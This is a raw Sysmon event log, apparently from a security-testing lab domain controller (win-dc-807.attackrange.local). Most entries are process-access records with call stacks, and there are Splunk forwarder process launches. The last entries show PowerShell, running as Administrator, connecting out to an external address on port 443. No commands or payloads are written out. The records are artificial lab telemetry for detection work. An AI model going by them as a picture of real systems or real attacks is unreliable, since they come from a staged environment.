15:52:28.101{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003931Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.101{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003930Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.101{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003929Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.101{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003928Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.101{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003927Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.101{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003926Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.101{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003925Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.101{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003924Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.101{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003923Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.101{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CBC-5FA1-C500-000000008801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003922Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.101{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CBC-5FA1-C500-000000008801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003921Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.102{D28789B6-7CBC-5FA1-C500-000000008801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003947Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CBD-5FA1-C600-000000008801}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003946Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003945Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003944Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003943Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003942Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003941Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003940Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003939Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003938Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003937Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CBD-5FA1-C600-000000008801}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003936Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.854{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CBD-5FA1-C600-000000008801}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003935Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:29.855{D28789B6-7CBD-5FA1-C600-000000008801}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003948Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:30.961{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50332-false168.61.186.235-443https 354300x80000000000000003950Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:32.814{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50334-false168.61.186.235-443https 354300x80000000000000003949Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:31.867{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50333-false168.61.186.235-443https 354300x80000000000000003951Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:33.704{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50336-false168.61.186.235-443https 11241100x80000000000000003961Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 